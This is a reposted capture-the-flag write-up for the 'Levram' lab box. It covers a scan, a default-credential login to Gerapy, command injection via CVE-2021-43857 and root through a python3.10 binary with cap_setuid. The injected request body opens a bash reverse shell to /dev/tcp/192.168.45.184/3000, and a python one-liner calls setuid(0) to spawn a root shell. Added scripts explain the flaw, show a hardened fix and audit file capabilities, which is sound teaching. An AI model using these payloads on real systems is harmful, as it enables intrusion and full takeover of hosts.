PG_Levram

admin, 2025-03-25 12:56:08

Information gathering:

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.24
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-22 19:56 CST
Nmap scan report for 192.168.216.24
Host is up (0.0036s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http-alt WSGIServer/0.2 CPython/3.10.6
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Sat, 22 Feb 2025 11:57:02 GMT
|     Server: WSGIServer/0.2 CPython/3.10.6
|     Content-Type: text/html
|     Content-Length: 9979
|     Vary: Origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     h1 { font-weight:normal; margin-bottom:.4em; }
|     h1 span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     td, th { vertical-align:top; padding:2px 3px; }
|     th { width:12em; text-align:right; color:#6
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 22 Feb 2025 11:56:57 GMT
|     Server: WSGIServer/0.2 CPython/3.10.6
|     Content-Type: text/html; charset=utf-8
|     Vary: Accept, Origin
|     Allow: GET, OPTIONS
|     Content-Length: 2530
|_    <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1"><link rel=icon href=/favicon.ico><title>Gerapy</title><link href=/static/css/chunk-10b2edc2.79f68610.css rel=prefetch><link href=/static/css/chunk-12e7e66d.8f856d8c.css rel=prefetch><link href=/static/css/chunk-39423506.2eb0fec8.css rel=prefetch><link href=/static/css/chunk-3a6102b3.0fe5e5eb.css rel=prefetch><link href=/static/css/chunk-4a7237a2.19df386b.css rel=prefetch><link href=/static/css/chunk-531d1845.b0b0d9e4.css rel=prefetch><link href=/static/css/chunk-582dc9b0.d60b5161.css rel=prefetch><link href=/static/css/chun
|_http-cors: GET POST PUT DELETE OPTIONS PATCH
|_http-server-header: WSGIServer/0.2 CPython/3.10.6
|_http-title: Gerapy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.80%I=7%D=2/22%Time=67B9BB89%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,AAA,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2022\x20Feb\x202
SF:025\x2011:56:57\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.10\.
SF:6\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept,\x
SF:20Origin\r\nAllow:\x20GET,\x20OPTIONS\r\nContent-Length:\x202530\r\n\r
SF:\n<!DOCTYPE\x20html><html\x20lang=en><head><meta\x20charset=utf-8><meta
SF:\x20http-equiv=X-UA-Compatible\x20content=\"IE=edge\"><meta\x20name=view
SF:port\x20content=\"width=device-width,initial-scale=1\"><link\x20rel=ico
SF:n\x20href=/favicon\.ico><title>Gerapy</title><link\x20href=/static/css/
SF:chunk-10b2edc2\.79f68610\.css\x20rel=prefetch><link\x20href=/static/css
SF:/chunk-12e7e66d\.8f856d8c\.css\x20rel=prefetch><link\x20href=/static/cs
SF:s/chunk-39423506\.2eb0fec8\.css\x20rel=prefetch><link\x20href=/static/c
SF:ss/chunk-3a6102b3\.0fe5e5eb\.css\x20rel=prefetch><link\x20href=/static/
SF:css/chunk-4a7237a2\.19df386b\.css\x20rel=prefetch><link\x20href=/static
SF:/css/chunk-531d1845\.b0b0d9e4\.css\x20rel=prefetch><link\x20href=/stati
SF:c/css/chunk-582dc9b0\.d60b5161\.css\x20rel=prefetch><link\x20href=/stat
SF:ic/css/chun")%r(FourOhFourRequest,279E,"HTTP/1\.1\x20404\x20Not\x20Foun
SF:d\r\nDate:\x20Sat,\x2022\x20Feb\x202025\x2011:57:02\x20GMT\r\nServer:\x
SF:20WSGIServer/0\.2\x20CPython/3\.10\.6\r\nContent-Type:\x20text/html\r\n
SF:Content-Length:\x209979\r\nVary:\x20Origin\r\n\r\n<!DOCTYPE\x20html>\n<
SF:html\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-typ
SF:e\"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x2
SF:0not\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20
SF:\x20<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<st
SF:yle\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20\{\x20padding:0
SF:;\x20margin:0;\x20\}\n\x20\x20\x20\x20body\x20\*\x20\{\x20padding:10px\x2
SF:020px;\x20\}\n\x20\x20\x20\x20body\x20\*\x20\*\x20\{\x20padding:0;\x20\}\n
SF:\x20\x20\x20\x20body\x20\{\x20font:small\x20sans-serif;\x20background:#e
SF:ee;\x20color:#000;\x20\}\n\x20\x20\x20\x20body>div\x20\{\x20border-bottom
SF::1px\x20solid\x20#ddd;\x20\}\n\x20\x20\x20\x20h1\x20\{\x20font-weight:nor
SF:mal;\x20margin-bottom:\.4em;\x20\}\n\x20\x20\x20\x20h1\x20span\x20\{\x20f
SF:ont-size:60%;\x20color:#666;\x20font-weight:normal;\x20\}\n\x20\x20\x20
SF:\x20table\x20\{\x20border:none;\x20border-collapse:\x20collapse;\x20width
SF::100%;\x20\}\n\x20\x20\x20\x20td,\x20th\x20\{\x20vertical-align:top;\x20p
SF:adding:2px\x203px;\x20\}\n\x20\x20\x20\x20th\x20\{\x20width:12em;\x20text
SF:-align:right;\x20color:#6");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/22%OT=22%CT=1%CU=39242%PV=Y%DS=4%DC=T%G=Y%TM=67B9BBE
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST1
OS:1NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT     ADDRESS
1   2.31 ms 192.168.45.1
2   2.32 ms 192.168.45.254
3   2.82 ms 192.168.251.1
4   3.59 ms 192.168.216.24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.99 seconds

Port 8000 serves HTTP (the http-title gives the application away as Gerapy). Searching for an exploit:

The Gerapy UI requires a login; a first try with admin/admin gets us into the system.

The public exploit for CVE-2021-43857 threw errors and I did not bother debugging it, so I sent the request by hand. Only the Authorization header matters: it carries the API token Gerapy issued after the admin/admin login. The Referer and Cookie headers are leftovers from the template this request was adapted from and can be dropped.

POST /api/project/1/parse HTTP/1.1
Host: 192.168.216.24:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Token bab40ccd50ebd5bbaa28f14015330b4d00a824b8
Connection: close
Referer: http://vulfocus.fofa.so:37380/
Cookie: zbx_sessionid=80402dd7222257588aeff3a3f5a4b7af; td_cookie=448830462; Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1639631760; zmGroup=1; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640325563
Cache-Control: max-age=0
Content-Length: 79
Content-Type: application/x-www-form-urlencoded

{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.184/3000 0>&1'`"}

The reverse shell comes back and local.txt is ours.
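Why that request body works, as an added example that is not Gerapy's code and not part of the original post: CVE-2021-43857 comes down to the `spider` value being interpolated into a command line that is handed to a shell, so the backticks are evaluated before scrapy ever runs. The script below models that pattern with `echo` standing in for `scrapy` (an assumption, so it runs on any box with /bin/sh) and puts the hardened form next to it: allow-list the name against the project's own spiders and pass it as one argv element with no shell at all. The payload string is constructed and harmless.

```python
import re
import subprocess

# Stand-in for the real `scrapy` binary so the demo runs anywhere (assumption;
# Gerapy invokes the real scrapy).
SCRAPY = "echo"

# Only names scrapy itself would accept as a spider: letters, digits, '_', '-', '.'
SPIDER_NAME = re.compile(r"[A-Za-z0-9_.-]+")


def build_cmd_vulnerable(url: str, spider: str) -> str:
    """Vulnerable pattern: the request's 'spider' value is glued into a single
    command string that is later run with shell=True, so `...`, $(...) and ;
    inside it are honoured by /bin/sh."""
    return f"{SCRAPY} parse {url} --spider={spider}"


def run_vulnerable(url: str, spider: str) -> str:
    proc = subprocess.run(build_cmd_vulnerable(url, spider),
                          shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


def run_argv_no_validation(url: str, spider: str) -> str:
    """shell=False alone already defeats the substitution: the backticks reach
    the child process as literal bytes in one argv element."""
    proc = subprocess.run([SCRAPY, "parse", url, f"--spider={spider}"],
                          capture_output=True, text=True)
    return proc.stdout.strip()


def build_argv_hardened(url: str, spider: str, known_spiders: set) -> list:
    """Hardened form: reject anything that is not an exact, known spider name,
    then build argv directly (never a shell string)."""
    if not SPIDER_NAME.fullmatch(spider) or spider not in known_spiders:
        raise ValueError(f"refusing spider name {spider!r}")
    return [SCRAPY, "parse", url, f"--spider={spider}"]


def run_hardened(url: str, spider: str, known_spiders: set) -> str:
    proc = subprocess.run(build_argv_hardened(url, spider, known_spiders),
                          shell=False, capture_output=True, text=True)
    return proc.stdout.strip()


if __name__ == "__main__":
    # Constructed payload in the shape of the one in the request above, with a
    # harmless `echo` where the reverse shell would be.
    evil = "`echo injected`"
    url = "http://example.com"
    print("shell=True  :", run_vulnerable(url, evil))          # substitution ran
    print("argv only   :", run_argv_no_validation(url, evil))  # backticks literal
    try:
        run_hardened(url, evil, {"quotes"})
    except ValueError as err:
        print("hardened    :", err)
    print("hardened ok :", run_hardened(url, "quotes", {"quotes"}))
```

The first call prints `--spider=injected`, proving the inner command executed; the argv-only call prints the backticks verbatim, and the hardened builder refuses the name before anything runs. Authentication is not a mitigation here: with the default admin/admin credentials the token in the request above is trivially obtained.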

The routine checks (SUID binaries, sudo -l) turned up nothing, so I uploaded linpeas.sh.

Trying CVE-2021-4034 (PwnKit) for privilege escalation failed.

Out of ideas, I looked at the hints and picked up a technique new to me: privilege escalation through Linux capabilities.

When we run a SUID command we usually need only a small subset of privileges, yet SUID hands the process the full privileges of root. So once a SUID binary has a vulnerability, it can be abused to perform arbitrary actions as root.

The problem with SUID is that its access control is too coarse. To control root's powers at a finer granularity, Linux added another mechanism: capabilities. Each capability covers one narrow privileged operation, for example:

CAP_CHOWN       change a file's owner (chown())
CAP_KILL        send signals to processes (kill(), signal())
CAP_SETUID      change a process's UID (setuid(), setreuid(), setresuid(), ...)
CAP_SYS_PTRACE  trace processes (ptrace())
CAP_SYS_TIME    set the system clock (settimeofday(), stime(), ...)

Capabilities can be attached to executables (file capabilities) and are listed with:
getcap -r / 2>/dev/null

The listing shows /usr/bin/python3.10 carrying cap_setuid. File capabilities are granted at exec, so any process started from that binary may call setuid(0) without being root. For the one-liner below the capability must also be in the effective set, which getcap prints as =ep:

/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'
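To see exactly what getcap is reporting, and to audit a box for the same foothold without relying on the getcap binary being present, here is an added example (not from the original post) that reads the security.capability xattr directly, decodes the vfs_cap_data structure the kernel stores there, renders it in getcap's notation and flags file capabilities that hand an unprivileged user a direct route to root. The sample xattr bytes are constructed; the walk over /usr/bin is what you would run on the target.

```python
import os
import stat
import struct

# Linux capability numbers (include/uapi/linux/capability.h); index = cap number.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x000001   # "all permitted caps are also effective"
XATTR_NAME = "security.capability"

# Capabilities that let an ordinary user become root more or less directly.
RISKY = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
         "cap_chown", "cap_fowner", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module"}

# Constructed sample: what the xattr holds after `setcap cap_setuid=ep <file>`
# (revision 2 header with the effective flag, permitted bit 7 = cap_setuid).
SAMPLE_SETUID_EP = struct.pack("<IIIII", 0x02000001, 1 << 7, 0, 0, 0)


def _names(mask: int) -> set:
    return {CAP_NAMES[i] for i in range(len(CAP_NAMES)) if (mask >> i) & 1}


def decode_vfs_cap(blob: bytes) -> dict:
    """Decode struct vfs_cap_data (revision 1, 2 or 3): a little-endian magic_etc
    word, then (permitted, inheritable) u32 pairs, then (rev 3 only) a rootid."""
    magic_etc, = struct.unpack_from("<I", blob, 0)
    revision = magic_etc & VFS_CAP_REVISION_MASK
    if revision == 0x01000000:
        words, rootid = 1, 0
    elif revision == 0x02000000:
        words, rootid = 2, 0
    elif revision == 0x03000000:
        words = 2
        rootid, = struct.unpack_from("<I", blob, 4 + 8 * words)
    else:
        raise ValueError(f"unknown vfs_cap_data revision {revision:#x}")
    permitted = inheritable = 0
    for i in range(words):
        p, inh = struct.unpack_from("<II", blob, 4 + 8 * i)
        permitted |= p << (32 * i)
        inheritable |= inh << (32 * i)
    return {"permitted": _names(permitted), "inheritable": _names(inheritable),
            "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE), "rootid": rootid}


def format_caps(caps: dict) -> str:
    """Render in getcap's notation, e.g. 'cap_setuid=ep' or 'cap_kill=eip'."""
    eff = "e" if caps["effective"] else ""
    both = caps["permitted"] & caps["inheritable"]
    only_p = caps["permitted"] - both
    only_i = caps["inheritable"] - both
    order = CAP_NAMES.index
    clauses = []
    if both:
        clauses.append(",".join(sorted(both, key=order)) + "=" + eff + "ip")
    if only_p:
        clauses.append(",".join(sorted(only_p, key=order)) + "=" + eff + "p")
    if only_i:
        clauses.append(",".join(sorted(only_i, key=order)) + "=i")
    return " ".join(clauses)


def dangerous(caps: dict) -> bool:
    return bool(caps["permitted"] & RISKY)


def scan_file_caps(root: str = "/") -> list:
    """Walk the tree and return (path, caps) for each regular file that carries a
    security.capability xattr: the same data `getcap -r /` prints."""
    found = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if not stat.S_ISREG(os.lstat(path).st_mode):
                    continue
                blob = os.getxattr(path, XATTR_NAME, follow_symlinks=False)
            except OSError:
                continue   # no xattr, permission denied, file vanished, ...
            found.append((path, decode_vfs_cap(blob)))
    return found


if __name__ == "__main__":
    print("sample:", format_caps(decode_vfs_cap(SAMPLE_SETUID_EP)))
    for path, caps in scan_file_caps("/usr/bin"):
        mark = "   <-- exploitable" if dangerous(caps) else ""
        print(f"{path} {format_caps(caps)}{mark}")
```

The `e` in `=ep` is the VFS_CAP_FLAGS_EFFECTIVE bit: at exec the kernel copies the file's permitted set into the new process and, because the flag is set, into its effective set too, which is why the python3.10 one-liner can call setuid(0) straight away. With `=p` only, the program would first have to raise the capability with capset, and the same one-liner fails. When auditing, treat anything this scanner marks exploitable on an interpreter or a binary that can spawn a shell exactly like a SUID root copy of it.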

Privilege escalation succeeded and proof.txt is ours.

Originally published on the WeChat official account EuSRC安全实验室 (EuSRC Security Lab): PG_Levram

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site accepts none. Questions can be sent by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Reposted on CN-SEC中文网 (with thanks to the original author): https://cn-sec.com/archives/3882736.html
